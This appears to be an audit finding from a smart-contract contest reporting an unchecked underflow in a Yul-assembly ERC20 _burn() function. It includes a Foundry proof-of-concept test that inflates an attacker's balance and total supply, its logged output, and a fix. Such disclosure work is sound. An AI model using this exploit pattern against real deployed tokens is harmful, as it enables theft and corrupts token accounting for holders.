Token-0x

First Flight #54

Beginner FriendlyDeFi

100 EXP

View all submissions

Previous Next

Submission Details

Impact: high

Likelihood: high

Unchecked Underflow in _burn() Allows Attacker to Mint Near-Infinite Tokens and Corrupt Total Supply

Author Revealed upon completion

Root + Impact

Unchecked balance and supply underflow in _burn() allows attackers to mint near-infinite tokens and corrupt total supply

Description

Normal behavior:
A compliant ERC20 _burn() function must revert whenever the burn amount exceeds the caller’s balance or the total supply. Burning tokens should reduce the account’s balance and decrease the total supply while ensuring supply/balance invariants remain valid.

Issue:
The _burn() function in ERC20Internals.sol performs unchecked subtraction in Yul assembly. Since assembly arithmetic does not revert on underflow, burning more tokens than an account owns causes both the user’s balance and the total supply to silently wrap around to extremely large uint256 values, effectively giving the attacker a massive balance and corrupting total supply.

function _burn(address account, uint256 value) internal {

assembly ("memory-safe") {

...

let supply := sload(supplySlot)

@> sstore(supplySlot, sub(supply, value)) // unchecked subtraction

...

let accountBalance := sload(accountBalanceSlot)

@> sstore(accountBalanceSlot, sub(accountBalance, value)) // unchecked subtraction

}

Risk

Likelihood:

Any public/external function using _burn() assumes it is safe and does not perform balance checks, which will routinely happen during token burns.
Developers expect primitives to revert on invalid operations (like _transfer and _spendAllowance do), making misuse of _burn() extremely likely in real deployments.

Impact:

The attacker’s balance becomes a massive uint256 number due to wrap-around, effectively giving them “infinite” tokens.
totalSupply also underflows, corrupting the token’s entire economic model and permanently breaking all accounting invariants.

Proof of Concept

The following Foundry test demonstrates how calling burn() with an amount greater than the user’s balance results in silent underflow, giving the attacker an extremely large token balance and corrupting the token’s totalSupply.
The _burn() function performs unchecked subtraction in assembly, allowing both balanceOf(attacker) and totalSupply to wrap around to near-maximum uint256 values.

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.24;

import "forge-std/Test.sol";

import "./Token.sol";

contract BurnUnderflowTest is Test {

Token token;

address attacker = address(0xBEEF);

function setUp() public {

token = new Token();

}

function testBurnUnderflowExploit() public {

// Step 1: Mint attacker only 10 tokens

token.mint(attacker, 10);

console.log("Initial totalSupply:", token.totalSupply());

console.log("Initial attacker balance:", token.balanceOf(attacker));

// Step 2: Attacker calls burn() with a huge number

uint256 maliciousBurnAmount = 1000 ether;

vm.prank(attacker);

token.burn(attacker, maliciousBurnAmount);

// Step 3: Log corrupted state after underflow

console.log("After exploit totalSupply:", token.totalSupply());

console.log("After exploit attacker balance:", token.balanceOf(attacker));

// Expected underflowed balance:

uint256 expectedUnderflowedBalance =

type(uint256).max - (maliciousBurnAmount - 10) + 1;

console.log("Expected underflowed attacker balance:", expectedUnderflowedBalance);

// Assertion to confirm exploit worked

assertEq(

token.balanceOf(attacker),

expectedUnderflowedBalance,

"Balance underflow did NOT occur vulnerability seems patched!"

);

}

Observed Results:

=== BEFORE EXPLOIT ===

Initial totalSupply: 10

Initial attacker balance: 10

=== AFTER UNDERFLOW BURN() CALL ===

After exploit totalSupply:

115792089237316195423570985008687907853269984665640564038457584007913129639946

After exploit attacker balance:

115792089237316195423570985008687907853269984665640564038457584007913129639946

Expected underflowed attacker balance:

115792089237316195423570985008687907853269984665640564038457584007913129639946

Explanation

The logs clearly show that after the attacker performs a burn operation with an amount far exceeding their 10-token balance:

totalSupply underflows to a massive uint256 number
balanceOf(attacker) underflows to the exact same massive number
The computed “expected underflowed balance” matches perfectly, confirming uncontrolled wrap-around

Because _burn() performs raw sub() operations in Yul without checking balances or total supply, arithmetic underflow does not revert but instead wraps, granting the attacker an effectively infinite token balance and corrupting the token supply permanently.

This confirms a critical accounting and state integrity vulnerability that allows attackers to mint arbitrary amounts of tokens through underflow.

Recommended Mitigation

function _burn(address account, uint256 value) internal {

assembly ("memory-safe") {

// Revert for zero address

- if iszero(account) {

- mstore(0x00, shl(224, 0x96c6fd1e))

- mstore(add(0x00, 4), 0x00)

- revert(0x00, 0x24)

- }

+ if iszero(account) {

+ // ERC20InvalidSender(account)

+ mstore(0x00, shl(224, 0x96c6fd1e))

+ mstore(add(0x00, 4), account)

+ revert(0x00, 0x24)

+ }

let ptr := mload(0x40)

let balanceSlot := _balances.slot

let supplySlot := _totalSupply.slot

- let supply := sload(supplySlot)

- sstore(supplySlot, sub(supply, value))

+ // Load supply and prevent supply underflow

+ let supply := sload(supplySlot)

+ if lt(supply, value) {

+ revert(0, 0)

+ }

+ // Load balance and prevent balance underflow

mstore(ptr, account)

mstore(add(ptr, 0x20), balanceSlot)

- let accountBalanceSlot := keccak256(ptr, 0x40)

- let accountBalance := sload(accountBalanceSlot)

- sstore(accountBalanceSlot, sub(accountBalance, value))

+ let accountBalanceSlot := keccak256(ptr, 0x40)

+ let accountBalance := sload(accountBalanceSlot)

+ if lt(accountBalance, value) {

+ // ERC20InsufficientBalance(account, balance, needed)

+ mstore(0x00, shl(224, 0xe450d38c))

+ mstore(add(0x00, 4), account)

+ mstore(add(0x00, 0x24), accountBalance)

+ mstore(add(0x00, 0x44), value)

+ revert(0x00, 0x64)

+ }

+ // Apply safe state changes

+ sstore(supplySlot, sub(supply, value))

+ sstore(accountBalanceSlot, sub(accountBalance, value))

+ // Emit Transfer(account, address(0), value)

+ mstore(ptr, value)

+ log3(

+ ptr,

+ 0x20,

+ 0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef,

+ account,

+ 0x0000000000000000000000000000000000000000000000000000000000000000

+ )

}

Added supply underflow check
Prevents totalSupply - value from wrapping to a massive uint256 number.
Added balance underflow check using custom error
Ensures accounts cannot burn more tokens than they own, matching ERC20 safety expectations.
Corrected error encoding for invalid sender
Uses the correct account parameter instead of hardcoded 0x00.
Added event emission for burns
Ensures Transfer(account → 0x0) logs are compliant with ERC20 and indexers.
Made state updates safe
Subtractions now only occur after validation, preventing silent arithmetic wrap-around.

Together, these changes eliminate the underflow exploit, enforce ERC20 invariants, and ensure totalSupply and balances remain accurate under all conditions.

Rewards breakdown

nSLOC

222

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!